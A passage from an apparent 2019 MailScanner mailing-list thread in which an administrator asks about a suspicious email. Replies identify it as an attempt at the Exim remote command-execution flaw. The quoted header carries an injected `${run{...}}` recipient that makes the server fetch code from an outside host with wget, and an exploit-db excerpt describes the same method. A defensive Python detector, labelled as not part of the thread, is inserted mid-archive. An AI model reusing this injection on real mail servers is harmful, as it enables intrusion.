possible attack against MailScanner?

Heino Backhaus heino.backhaus at fink-computer.de
Mon Jul 15 15:14:54 UTC 2019


Yes, I think you're right :-D It looks very similar to this:

    - If Exim was configured to recognize tags in the local part of the
      recipient's address (via "local_part_suffix = +* : -*" for example),
      then a remote attacker can simply reuse our local-exploitation method
      with an RCPT TO "balrog+${run{...}}@localhost" (where "balrog" is the
      name of a local user).


Source: https://www.exploit-db.com/exploits/46974

Phew... my MailScanner can live on...

Thank you!

Kind regards

H. Backhaus 

Fink-Computer Systeme
Heggrabenstr. 9, 35435 Wettenberg
Email: heino.backhaus at fink-computer.de
Web: www.fink-computer.de
Fax: +49-641-98444638
Phone: +49-641-98444640
UST-ID: DE151040770
HRB: 2143 Gießen
GF: Fredi Fink

I was gratified to be able to answer promptly, and I did.
I said I didn't know.
 Mark Twain
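A defender-side check for the pattern discussed above, added here as an example and not code from the thread, MailScanner or Exim: it pulls the envelope recipient out of a Received header and flags local parts that hide Exim `${run{...}}` expansion syntax behind a `+tag`, then renders the hex escapes so an analyst can read what the sender tried to run. The sample header is constructed from the one quoted in the thread (with the poster's already-redacted IPs); the function and class names are my own assumptions, and the decoding is best effort because the quoted header had its backslashes stripped.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample, modelled on the Received header quoted in the thread;
# the poster had already replaced the two real IPs with 1.2.3.4 / 5.6.7.8.
SAMPLE_RECEIVED = (
    "Received: from sab.com (unknown [46.22.132.94]) by mailscanner.mydomain.local "
    "(Postfix) with SMTP id D3F551005AD for "
    "<root+${run{x2fbinx2fsht-ctx22wgetx201.2.3.4x2fsbzx2f5.6.7.8x22}}"
    "@mailscanner.mydomain.local>; Thu, 11 Jul 2019 19:34:58 +0200 (CEST)"
)

RUN_EXPANSION = re.compile(r"\$\{run\{", re.IGNORECASE)  # Exim ${run{cmd}} item
TAGGED_EXPANSION = re.compile(r"[+-].*\$\{")              # expansion behind a +tag/-tag
# \x2f-style escapes carry '/', space and quotes that a plain local part may not
# contain; the quoted header lost its backslashes, so a bare "x2f" is accepted too.
HEX_ESCAPE = re.compile(r"\\?x([0-9a-fA-F]{2})")

@dataclass
class Verdict:
    address: str
    local_part: str
    suspicious: bool = False
    reasons: List[str] = field(default_factory=list)
    decoded_local_part: str = ""  # escapes rendered; \t separators are not recoverable

def extract_for_address(received: str) -> Optional[str]:
    """Return the envelope recipient recorded in the 'for <...>' clause, if any."""
    m = re.search(r"\bfor\s+<([^>]+)>", received)
    return m.group(1) if m else None

def decode_hex_escapes(text: str) -> str:
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)

def analyse_recipient(address: str) -> Verdict:
    """Flag a recipient whose local part carries Exim string-expansion syntax."""
    local = address.rpartition("@")[0]
    v = Verdict(address=address, local_part=local)
    if RUN_EXPANSION.search(local):
        v.reasons.append("${run{...}} command expansion in local part")
    if TAGGED_EXPANSION.search(local):
        v.reasons.append("expansion smuggled behind a local_part_suffix tag")
    # Hex-looking text alone is not evidence (think 'max23'); count it only with an expansion.
    if v.reasons and HEX_ESCAPE.search(local):
        v.reasons.append("hex escapes encode '/', space or quotes")
    v.suspicious = bool(v.reasons)
    v.decoded_local_part = decode_hex_escapes(local)
    return v
```

Running `analyse_recipient(extract_for_address(SAMPLE_RECEIVED))` on the constructed header yields three reasons and the decoded local part `root+${run{/bin/sht-ct"wget 1.2.3.4/sbz/5.6.7.8"}}`; a plain tagged address such as `alice+news@example.com` is not flagged.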

On 15.07.2019 at 13:16, Shawn Iverson via MailScanner wrote:
> Agreed.
>
> On Mon, Jul 15, 2019 at 7:14 AM Martin Hepworth <maxsec at gmail.com
> <mailto:maxsec at gmail.com>> wrote:
>
>     Looks like an attempt at the Exim vulnerability exploitation
>     rather than mailscanner
>
>     On Mon, 15 Jul 2019 at 11:59, Heino Backhaus
>     <heino.backhaus at fink-computer.de
>     <mailto:heino.backhaus at fink-computer.de>> wrote:
>
>         Hello list,
>
>         I need some help analysing the following email, which I received
>         last week.
>
>         Mailwatch Mail-Metadata:
>
>         Received: from sab.com (unknown [46.22.132.94])
>              by mailscanner.mydomain.local (Postfix) with SMTP id
>         D3F551005AD
>              for
>         <root+${run{x2fbinx2fsht-ctx22wgetx20*1.2.3.4*x2fsbzx2f*5.6.7.8*x22}}@mailscanner.mydomain.local>;
>         Thu, 11 Jul 2019 19:34:58 +0200 (CEST)
>         Received: 1
>         Received: 2
>         Received: 3
>         Received: 4
>         Received: 5
>         Received: 6
>         Received: 7
>         Received: 8
>         Received: 9
>         Received: 10
>         Received: 11
>         Received: 12
>         Received: 13
>         Received: 14
>         Received: 15
>         Received: 16
>         Received: 17
>         Received: 18
>         Received: 19
>         Received: 20
>         Received: 21
>         Received: 22
>         Received: 23
>         Received: 24
>         Received: 25
>         Received: 26
>         Received: 27
>         Received: 28
>         Received: 29
>         Received: 30
>         Received: 31
>
>
>
>         IP1: *199.204.214.40* changed to *1.2.3.4* to disarm
>         this...just in case...
>         IP2: *87.138.227.107* changed to *5.6.7.8* to disarm
>         this...just in case...
>
>         Versions:
>         MailWatch Version: 1.2.9
>         OS: Ubuntu 16.04.6 LTS (Xenial Xerus)
>         Postfix Version: 3.1.0
>         MailScanner Version: 5.1.2
>         ClamAV Version: 0.102.0-devel-20190715
>         SpamAssassin Version: 3.4.2
>         PHP Version: 5.6.40-8+ubuntu16.04.1+deb.sury.org+1
>         MySQL Version: 5.7.26-0ubuntu0.16.04.1
>
>         Can you help me bring some light into this darkness...
>
>
>         -- 
>         This e-mail has been checked for viruses and dangerous attachments
>         by MailScanner <http://www.mailscanner.info/> and is probably
>         virus-free.
>
>
>         -- 
>         MailScanner mailing list
>         mailscanner at lists.mailscanner.info
>         http://lists.mailscanner.info/mailman/listinfo/mailscanner
>
>     -- 
>     Martin Hepworth, CISSP
>     Oxford, UK
>
>
>
>
>
> -- 
> Shawn Iverson, CETL
> Director of Technology
> Rush County Schools
> 765-932-3901 option 7
> iversons at rushville.k12.in.us
>
> Cybersecurity
>
>
>


--
This message has been checked for viruses and other dangerous content
and is - assuming up-to-date virus scanners - clean.

